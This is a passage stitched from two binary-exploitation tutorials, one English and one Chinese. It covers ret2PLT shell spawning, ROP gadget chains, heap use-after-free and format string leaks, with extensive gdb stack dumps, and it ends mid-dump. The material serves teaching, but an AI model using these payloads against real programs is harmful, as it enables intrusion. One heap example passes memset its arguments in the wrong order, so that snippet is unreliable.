When the main returns, we want our stack to look like something normally called system. Recall what is on the stack after a function has been called:

        ...                                 // More arguments
        0xffff0008: 0x00000002              // Argument 2
        0xffff0004: 0x00000001              // Argument 1
ESP ->  0xffff0000: 0x080484d0              // Return address

So the main's stack frame needs to look like this:

        0xffff0008: 0xdeadbeef              // system argument 1
        0xffff0004: 0xdeadbeef              // return address for system
ESP ->  0xffff0000: 0x08048450              // return address for main (system's PLT entry)

Then when the main returns, it will jump into the system's PLT entry and the stack will appear just like the system had been called normally for the first time.

Note: we don't care about the return address system will return to because we will have already gotten our shell by then!

Arguments

This is a good start, but we need to pass an argument to the system for anything to happen. As mentioned in the page on ASLR, the stack and dynamic libraries "move around" each time a program is run, which means we can't easily use data on the stack or a string in libc for our argument. In this case, however, we have a very convenient name global which will be at a known location in the binary (in the BSS segment).

Putting it together

Our exploit will need to do the following:

Enter "sh" or another command to run as the name
Fill the stack with
1. Garbage up to the saved EIP
2. The address of the system's PLT entry
3. A fake return address for the system to jump to when it's done
4. The address of the name global acts as the first argument to the system

64 bit

In 64-bit binaries, we have to work a bit harder to pass arguments to functions. The basic idea of overwriting the saved RIP is the same, but as discussed in calling conventions, arguments are passed in registers in 64-bit programs. In the case of running the system, this means we will need to find a way to control the RDI register.

To do this, we'll use small snippets of assembly in the binary, called "gadgets." These gadgets usually pop one or more registers off of the stack, and then call ret, which allows us to chain them together by making a large fake call stack.

For example, if we needed control of both RDI and RSI, we might find two gadgets in our program that look like this (using a tool like rp++ or ROPgadget):

0x400c01: pop rdi; ret
0x400c03: pop rsi; pop r15; ret

We can set up a fake call stack with these gadgets to sequentially execute them, poping values we control into registers, and then end with a jump to the system.

Example

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
        0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget
        0xffff0008: 0xdeadbeef          // value to be popped into rdi
RSP ->  0xffff0000: 0x400c01            // address of rdi gadget

Stepping through this one instruction at a time, main returns, jumping to our pop rdi gadget:

RIP = 0x400c01 (pop rdi)
RDI = UNKNOWN
RSI = UNKNOWN

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
        0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget
RSP ->  0xffff0008: 0xdeadbeef          // value to be popped into rdi

pop rdi is then executed, popping the top of the stack into RDI:

RIP = 0x400c02 (ret)
RDI = 0xdeadbeef
RSI = UNKNOWN

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
RSP ->  0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget

The RDI gadget then rets into our RSI gadget:

RIP = 0x400c03 (pop rsi)
RDI = 0xdeadbeef
RSI = UNKNOWN

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
RSP ->  0xffff0018: 0x1337beef          // value we want in rsi

RSI and R15 are popped:

RIP = 0x400c05 (ret)
RDI = 0xdeadbeef
RSI = 0x1337beef

RSP ->  0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled

And finally, the RSI gadget rets, jumping to whatever function we want, but now with RDI and RSI set to values we control.

Binary Security

Binary Security is using tools and methods in order to secure programs from being manipulated and exploited. These tools are not infallible, but when used together and implemented properly, they can raise the difficulty of exploitation greatly.

Some methods covered include:

The Heap

A heap is a place in memory that a program can use to dynamically create objects. Creating objects on the heap has some advantages compared to using the stack:

Heap allocations can be dynamically sized
Heap allocations "persist" when a function returns

There are also some disadvantages, however:

Heap allocations can be slower
Heap allocations must be manually cleaned up

Using the heap

In C, there are a number of functions used to interact with the heap, but we're going to focus on the two core ones:

malloc: allocate n bytes on the heap
free: free the given allocation

Let's see how these could be used in a program:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    unsigned alloc_size = 0;
    char *stuff;

    printf("Number of bytes? ");
    scanf("%u", &alloc_size);

    stuff = malloc(alloc_size + 1);
    memset(0, stuff, alloc_size + 1);

    read(0, stuff, alloc_size);

    printf("You wrote: %s", stuff);

    free(stuff);

    return 0;
}

This program reads in a size from the user, creates an allocation of that size on the heap, reads in that many bytes, then prints it back out to the user.

Heap Exploits

Overflow

Much like a stack buffer overflow, a heap overflow is a vulnerability where more data than can fit in the allocated buffer is read in. This could lead to heap metadata corruption, or corruption of other heap objects, which could in turn provide a new attack surface.

Use After Free (UAF)

Once free is called on an allocation, the allocator is free to reallocate that chunk of memory in future calls to malloc if it so chooses. However, if the program author isn't careful and uses the freed object later on, the contents may be corrupt (or even attacker controlled). This is called use after free or UAF.

Example

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

typedef struct string {
    unsigned length;
    char *data;
} string;

int main() {
    struct string* s = malloc(sizeof(string));
    puts("Length:");
    scanf("%u", &s->length);
    s->data = malloc(s->length + 1);
    memset(s->data, 0, s->length + 1);
    puts("Data:");
    read(0, s->data, s->length);

    free(s->data);
    free(s);

    char *s2 = malloc(16);
    memset(s2, 0, 16);
    puts("More data:");
    read(0, s2, 15);

    // Now using s again, a UAF

    puts(s->data);

    return 0;
}

In this example, we have a string structure with a length and a pointer to the actual string data. We properly allocate, fill, and then free an instance of this structure. Then we make another allocation, fill it, and then improperly reference the freed string. Due to how Glibc's allocator works, s2 will actually get the same memory as the original s allocation, which in turn gives us the ability to control the s->data pointer. This could be used to leak program data.

Advanced Heap Exploitation

Not only can the heap be exploited by the data in allocations, but exploits can also use the underlying mechanisms in malloc, free, etc. to exploit a program. This is beyond the scope of CTF 101, but here are a few recommended resources:

Format String Vulnerability

A format string vulnerability is a bug where user input is passed as the format argument to printf, scanf, or another function in that family.

The format argument has many different specifies which could allow an attacker to leak data if they control the format argument to printf. Since printf and similar are variadic functions, they will continue popping data off of the stack according to the format.

For example, if we can make the format argument "%x.%x.%x.%x", printf will pop off four stack values and print them in hexadecimal, potentially leaking sensitive information.

printf can also index to an arbitrary "argument" with the following syntax: "%n$x" (where n is the decimal index of the argument you want).

While these bugs are powerful, they're very rare nowadays, as all modern compilers warn when printf is called with a non-constant string.

Example

#include <stdio.h>
#include <unistd.h>

int main() {
    int secret_num = 0x8badf00d;

    char name[64] = {0};
    read(0, name, 64);
    printf("Hello ");
    printf(name);
    printf("! You'll never get my secret!\n");
    return 0;
}

Due to how GCC decided to lay out the stack, secret_num is actually at a lower address on the stack than name, so we only have to go to the 7th "argument" in printf to leak the secret:

$ ./fmt_string
%7$llx
Hello 8badf00d3ea43eef
! You'll never get my secret!

Binary Exploitation

3.1.1 格式化字符串漏洞

格式化输出函数和格式字符串

在 C 语言基础章节中，我们详细介绍了格式化输出函数和格式化字符串的内容。在开始探索格式化字符串漏洞之前，强烈建议回顾该章节。这里我们简单回顾几个常用的。

函数

#include <stdio.h>

int printf(const char *format, ...);
int fprintf(FILE *stream, const char *format, ...);
int dprintf(int fd, const char *format, ...);
int sprintf(char *str, const char *format, ...);
int snprintf(char *str, size_t size, const char *format, ...);

转换指示符

字符	类型	使用
d	4-byte	Integer
u	4-byte	Unsigned Integer
x	4-byte	Hex
s	4-byte ptr	String
c	1-byte	Character

长度

字符	类型	使用
hh	1-byte	char
h	2-byte	short int
l	4-byte	long int
ll	8-byte	long long int

示例

#include<stdio.h>
#include<stdlib.h>
void main() {
    char *format = "%s";
    char *arg1 = "Hello World!\n";
    printf(format, arg1);
}
printf("%03d.%03d.%03d.%03d", 127, 0, 0, 1);    // "127.000.000.001"
printf("%.2f", 1.2345);   // 1.23
printf("%#010x", 3735928559);   // 0xdeadbeef

printf("%s%n", "01234", &n);  // n = 5

格式化字符串漏洞基本原理

在 x86 结构下，格式字符串的参数是通过栈传递的，看一个例子：

#include<stdio.h>
void main() {
    printf("%s %d %s", "Hello World!", 233, "\n");
}
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000053d <+0>:     lea    ecx,[esp+0x4]
   0x00000541 <+4>:     and    esp,0xfffffff0
   0x00000544 <+7>:     push   DWORD PTR [ecx-0x4]
   0x00000547 <+10>:    push   ebp
   0x00000548 <+11>:    mov    ebp,esp
   0x0000054a <+13>:    push   ebx
   0x0000054b <+14>:    push   ecx
   0x0000054c <+15>:    call   0x585 <__x86.get_pc_thunk.ax>
   0x00000551 <+20>:    add    eax,0x1aaf
   0x00000556 <+25>:    lea    edx,[eax-0x19f0]
   0x0000055c <+31>:    push   edx
   0x0000055d <+32>:    push   0xe9
   0x00000562 <+37>:    lea    edx,[eax-0x19ee]
   0x00000568 <+43>:    push   edx
   0x00000569 <+44>:    lea    edx,[eax-0x19e1]
   0x0000056f <+50>:    push   edx
   0x00000570 <+51>:    mov    ebx,eax
   0x00000572 <+53>:    call   0x3d0 <printf@plt>
   0x00000577 <+58>:    add    esp,0x10
   0x0000057a <+61>:    nop
   0x0000057b <+62>:    lea    esp,[ebp-0x8]
   0x0000057e <+65>:    pop    ecx
   0x0000057f <+66>:    pop    ebx
   0x00000580 <+67>:    pop    ebp
   0x00000581 <+68>:    lea    esp,[ecx-0x4]
   0x00000584 <+71>:    ret
End of assembler dump.
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x56557000 --> 0x1efc
EBX: 0x56557000 --> 0x1efc
ECX: 0xffffd250 --> 0x1
EDX: 0x5655561f ("%s %d %s")
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd220 --> 0x5655561f ("%s %d %s")
EIP: 0x56555572 (<main+53>: call   0x565553d0 <printf@plt>)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555569 <main+44>:    lea    edx,[eax-0x19e1]
   0x5655556f <main+50>:    push   edx
   0x56555570 <main+51>:    mov    ebx,eax
=> 0x56555572 <main+53>:    call   0x565553d0 <printf@plt>
   0x56555577 <main+58>:    add    esp,0x10
   0x5655557a <main+61>:    nop
   0x5655557b <main+62>:    lea    esp,[ebp-0x8]
   0x5655557e <main+65>:    pop    ecx
Guessed arguments:
arg[0]: 0x5655561f ("%s %d %s")
arg[1]: 0x56555612 ("Hello World!")
arg[2]: 0xe9
arg[3]: 0x56555610 --> 0x6548000a ('\n')
[------------------------------------stack-------------------------------------]
0000| 0xffffd220 --> 0x5655561f ("%s %d %s")
0004| 0xffffd224 --> 0x56555612 ("Hello World!")
0008| 0xffffd228 --> 0xe9
0012| 0xffffd22c --> 0x56555610 --> 0x6548000a ('\n')
0016| 0xffffd230 --> 0xffffd250 --> 0x1
0020| 0xffffd234 --> 0x0
0024| 0xffffd238 --> 0x0
0028| 0xffffd23c --> 0xf7df1253 (<__libc_start_main+243>:   add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555572 in main ()
gdb-peda$ r
Continuing
Hello World! 233
[Inferior 1 (process 27416) exited with code 022]

根据 cdecl 的调用约定，在进入 printf() 函数之前，将参数从右到左依次压栈。进入 printf() 之后，函数首先获取第一个参数，一次读取一个字符。如果字符不是 %，字符直接复制到输出中。否则，读取下一个非空字符，获取相应的参数并解析输出。（注意：% d 和 %d 是一样的）

接下来我们修改一下上面的程序，给格式字符串加上 %x %x %x %3$s，使它出现格式化字符串漏洞：

#include<stdio.h>
void main() {
    printf("%s %d %s %x %x %x %3$s", "Hello World!", 233, "\n");
}

反汇编后的代码同上，没有任何区别。我们主要看一下参数传递：

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x56557000 --> 0x1efc
EBX: 0x56557000 --> 0x1efc
ECX: 0xffffd250 --> 0x1
EDX: 0x5655561f ("%s %d %s %x %x %x %3$s")
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd220 --> 0x5655561f ("%s %d %s %x %x %x %3$s")
EIP: 0x56555572 (<main+53>: call   0x565553d0 <printf@plt>)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555569 <main+44>:    lea    edx,[eax-0x19e1]
   0x5655556f <main+50>:    push   edx
   0x56555570 <main+51>:    mov    ebx,eax
=> 0x56555572 <main+53>:    call   0x565553d0 <printf@plt>
   0x56555577 <main+58>:    add    esp,0x10
   0x5655557a <main+61>:    nop
   0x5655557b <main+62>:    lea    esp,[ebp-0x8]
   0x5655557e <main+65>:    pop    ecx
Guessed arguments:
arg[0]: 0x5655561f ("%s %d %s %x %x %x %3$s")
arg[1]: 0x56555612 ("Hello World!")
arg[2]: 0xe9
arg[3]: 0x56555610 --> 0x6548000a ('\n')
[------------------------------------stack-------------------------------------]
0000| 0xffffd220 --> 0x5655561f ("%s %d %s %x %x %x %3$s")
0004| 0xffffd224 --> 0x56555612 ("Hello World!")
0008| 0xffffd228 --> 0xe9
0012| 0xffffd22c --> 0x56555610 --> 0x6548000a ('\n')
0016| 0xffffd230 --> 0xffffd250 --> 0x1
0020| 0xffffd234 --> 0x0
0024| 0xffffd238 --> 0x0
0028| 0xffffd23c --> 0xf7df1253 (<__libc_start_main+243>:   add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555572 in main ()
gdb-peda$ c
Continuing.
Hello World! 233
 ffffd250 0 0
[Inferior 1 (process 27480) exited with code 041]

这一次栈的结构和上一次相同，只是格式字符串有变化。程序打印出了七个值（包括换行），而我们其实只给出了前三个值的内容，后面的三个 %x 打印出了 0xffffd230~0xffffd238 栈内的数据，这些都不是我们输入的。而最后一个参数 %3$s 是对 0xffffd22c 中 \n 的重用。

上一个例子中，格式字符串中要求的参数个数大于我们提供的参数个数。在下面的例子中，我们省去了格式字符串，同样存在漏洞：

#include<stdio.h>
void main() {
    char buf[50];
    if (fgets(buf, sizeof buf, stdin) == NULL)
        return;
    printf(buf);
}
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd1fa ("Hello %x %x %x !\n")
EBX: 0x56557000 --> 0x1ef8
ECX: 0xffffd1fa ("Hello %x %x %x !\n")
EDX: 0xf7f9685c --> 0x0
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd1e0 --> 0xffffd1fa ("Hello %x %x %x !\n")
EIP: 0x5655562a (<main+77>: call   0x56555450 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555623 <main+70>:    sub    esp,0xc
   0x56555626 <main+73>:    lea    eax,[ebp-0x3e]
   0x56555629 <main+76>:    push   eax
=> 0x5655562a <main+77>:    call   0x56555450 <printf@plt>
   0x5655562f <main+82>:    add    esp,0x10
   0x56555632 <main+85>:    jmp    0x56555635 <main+88>
   0x56555634 <main+87>:    nop
   0x56555635 <main+88>:    mov    eax,DWORD PTR [ebp-0xc]
Guessed arguments:
arg[0]: 0xffffd1fa ("Hello %x %x %x !\n")
[------------------------------------stack-------------------------------------]
0000| 0xffffd1e0 --> 0xffffd1fa ("Hello %x %x %x !\n")
0004| 0xffffd1e4 --> 0x32 ('2')
0008| 0xffffd1e8 --> 0xf7f95580 --> 0xfbad2288
0012| 0xffffd1ec --> 0x565555f4 (<main+23>: add    ebx,0x1a0c)
0016| 0xffffd1f0 --> 0xffffffff
0020| 0xffffd1f4 --> 0xffffd47a ("/home/firmy/Desktop/RE4B/c.out")
0024| 0xffffd1f8 --> 0x65485ea0
0028| 0xffffd1fc ("llo %x %x %x !\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x5655562a in main ()
gdb-peda$ c
Continuing.
Hello 32 f7f95580 565555f4 !
[Inferior 1 (process 28253) exited normally]

如果大家都是好孩子，输入正常的字符，程序就不会有问题。由于没有格式字符串，如果我们在 buf 中输入一些转换指示符，则 printf() 会把它当做格式字符串并解析，漏洞发生。例如上面演示的我们输入了 Hello %x %x %x !\n（其中 \n 是 fgets() 函数给我们自动加上的），这时，程序就会输出栈内的数据。

我们可以总结出，其实格式字符串漏洞发生的条件就是格式字符串要求的参数和实际提供的参数不匹配。下面我们讨论两个问题：

为什么可以通过编译？
- 因为 printf() 函数的参数被定义为可变的。
- 为了发现不匹配的情况，编译器需要理解 printf() 是怎么工作的和格式字符串是什么。然而，编译器并不知道这些。
- 有时格式字符串并不是固定的，它可能在程序执行中动态生成。
```
printf()
```
函数自己可以发现不匹配吗？
- printf() 函数从栈中取出参数，如果它需要 3 个，那它就取出 3 个。除非栈的边界被标记了，否则 printf() 是不会知道它取出的参数比提供给它的参数多了。然而并没有这样的标记。

格式化字符串漏洞利用

通过提供格式字符串，我们就能够控制格式化函数的行为。漏洞的利用主要有下面几种。

使程序崩溃

格式化字符串漏洞通常要在程序崩溃时才会被发现，所以利用格式化字符串漏洞最简单的方式就是使进程崩溃。在 Linux 中，存取无效的指针会引起进程收到 SIGSEGV 信号，从而使程序非正常终止并产生核心转储（在 Linux 基础的章节中详细介绍了核心转储）。我们知道核心转储中存储了程序崩溃时的许多重要信息，这些信息正是攻击者所需要的。

利用类似下面的格式字符串即可触发漏洞：

printf("%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s")

对于每一个 %s，printf() 都要从栈中获取一个数字，把该数字视为一个地址，然后打印出地址指向的内存内容，直到出现一个 NULL 字符。
因为不可能获取的每一个数字都是地址，数字所对应的内存可能并不存在。
还有可能获得的数字确实是一个地址，但是该地址是被保护的。

查看栈内容

使程序崩溃只是验证漏洞的第一步，攻击者还可以利用格式化输出函数来获得内存的内容，为下一步漏洞利用做准备。我们已经知道了，格式化字符串函数会根据格式字符串从栈上取值。由于在 x86 上栈由高地址向低地址增长，而 printf() 函数的参数是以逆序被压入栈的，所以参数在内存中出现的顺序与在 printf() 调用时出现的顺序是一致的。

下面的演示我们都使用下面的源码：

#include<stdio.h>
void main() {
    char format[128];
    int arg1 = 1, arg2 = 0x88888888, arg3 = -1;
    char arg4[10] = "ABCD";
    scanf("%s", format);
    printf(format, arg1, arg2, arg3, arg4);
    printf("\n");
}
# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -m32 -fno-stack-protector -no-pie fmt.c

我们先输入 b main 设置断点，使用 n 往下执行，在 call 0x56555460 <__isoc99_scanf@plt> 处输入 %08x.%08x.%08x.%08x.%08x，然后使用 c 继续执行，即可输出结果。

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
EIP: 0x56555642 (<main+133>:    call   0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555638 <main+123>:       push   DWORD PTR [ebp-0xc]
   0x5655563b <main+126>:       lea    eax,[ebp-0x94]
   0x56555641 <main+132>:       push   eax
=> 0x56555642 <main+133>:       call   0x56555430 <printf@plt>
   0x56555647 <main+138>:       add    esp,0x20
   0x5655564a <main+141>:       sub    esp,0xc
   0x5655564d <main+144>:       push   0xa
   0x5655564f <main+146>:       call   0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>:     add    ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ x/10x $esp
0xffffd550:     0xffffd584      0x00000001      0x88888888      0xffffffff
0xffffd560:     0xffffd57a      0xffffd584      0x56555220      0x565555d7
0xffffd570:     0xf7ffda54      0x00000001
gdb-peda$ c
Continuing.
00000001.88888888.ffffffff.ffffd57a.ffffd584

格式化字符串 0xffffd584 的地址出现在内存中的位置恰好位于参数 arg1、arg2、arg3、arg4 之前。格式字符串 %08x.%08x.%08x.%08x.%08x 表示函数 printf() 从栈中取出 5 个参数并将它们以 8 位十六进制数的形式显示出来。格式化输出函数使用一个内部变量来标志下一个参数的位置。开始时，参数指针指向第一个参数（arg1）。随着每一个参数被相应的格式规范所耗用，参数指针的值也根据参数的长度不断递增。在显示完当前执行函数的剩余自动变量之后，printf() 将显示当前执行函数的栈帧（包括返回地址和参数等）。

当然也可以使用 %p.%p.%p.%p.%p 得到相似的结果。

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%p.%p.%p.%p.%p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%p.%p.%p.%p.%p")
EIP: 0x56555642 (<main+133>:    call   0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555638 <main+123>:       push   DWORD PTR [ebp-0xc]
   0x5655563b <main+126>:       lea    eax,[ebp-0x94]
   0x56555641 <main+132>:       push   eax
=> 0x56555642 <main+133>:       call   0x56555430 <printf@plt>
   0x56555647 <main+138>:       add    esp,0x20
   0x5655564a <main+141>:       sub    esp,0xc
   0x5655564d <main+144>:       push   0xa
   0x5655564f <main+146>:       call   0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%p.%p.%p.%p.%p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%p.%p.%p.%p.%p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%p.%p.%p.%p.%p")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>:     add    ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ c
Continuing.
0x1.0x88888888.0xffffffff.0xffffd57a.0xffffd584

上面的方法都是依次获得栈中的参数，如果我们想要直接获得被指定的某个参数，则可以使用类似下面的格式字符串：

%<arg#>$<format>

%n$x

这里的 n 表示栈中格式字符串后面的第 n 个值。

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
EIP: 0x56555642 (<main+133>:    call   0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555638 <main+123>:       push   DWORD PTR [ebp-0xc]
   0x5655563b <main+126>:       lea    eax,[ebp-0x94]
   0x56555641 <main+132>:       push   eax
=> 0x56555642 <main+133>:       call   0x56555430 <printf@plt>
   0x56555647 <main+138>:       add    esp,0x20
   0x5655564a <main+141>:       sub    esp,0xc
   0x5655564d <main+144>:       push   0xa
   0x5655564f <main+146>:       call   0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>:     add    ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ x/10w $esp
0xffffd550:     0xffffd584      0x00000001      0x88888888      0xffffffff
0xffffd560:     0xffffd57a      0xffffd584      0x56555220      0x565555d7
0xffffd570:     0xf7ffda54      0x00000001
gdb-peda$ c
Continuing.
ffffffff.00000001.0x88888888.0x88888888.0xffffd57a.0xffffd584.0x56555220

这里，格式字符串的地址为 0xffffd584。我们通过格式字符串 %3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p 分别获取了 arg3、arg1、两个 arg2、arg4 和栈上紧跟参数的两个值。可以看到这种方法非常强大，可以获得栈中任意的值。

查看任意地址的内存

攻击者可以使用一个“显示指定地址的内存”的格式规范来查看任意地址的内存。例如，使用 %s 显示参数　指针所指定的地址的内存，将它作为一个 ASCII 字符串处理，直到遇到一个空字符。如果攻击者能够操纵这个参数指针指向一个特定的地址，那么 %s 就会输出该位置的内存内容。

还是上面的程序，我们输入 %4$s，输出的 arg4 就变成了 ABCD 而不是地址 0xffffd57a：

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%4$s")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%4$s")
EIP: 0x56555642 (<main+133>:    call   0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555638 <main+123>:       push   DWORD PTR [ebp-0xc]
   0x5655563b <main+126>:       lea    eax,[ebp-0x94]
   0x56555641 <main+132>:       push   eax
=> 0x56555642 <main+133>:       call   0x56555430 <printf@plt>
   0x56555647 <main+138>:       add    esp,0x20
   0x5655564a <main+141>:       sub    esp,0xc
   0x5655564d <main+144>:       push   0xa
   0x5655564f <main+146>:       call   0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%4$s")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%4$s")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%4$s")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>:     add    ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ c
Continuing.
ABCD

上面的例子只能读取栈中已有的内容，如果我们想获取的是任意的地址的内容，就需要我们自己将地址写入到栈中。我们输入 AAAA.%p 这样的格式的字符串，观察一下栈有什么变化。

gdb-peda$ python print("AAAA"+".%p"*20)
AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
...
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
EIP: 0x56555642 (<main+133>:    call   0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555638 <main+123>:       push   DWORD PTR [ebp-0xc]
   0x5655563b <main+126>:       lea    eax,[ebp-0x94]
   0x56555641 <main+132>:       push   eax
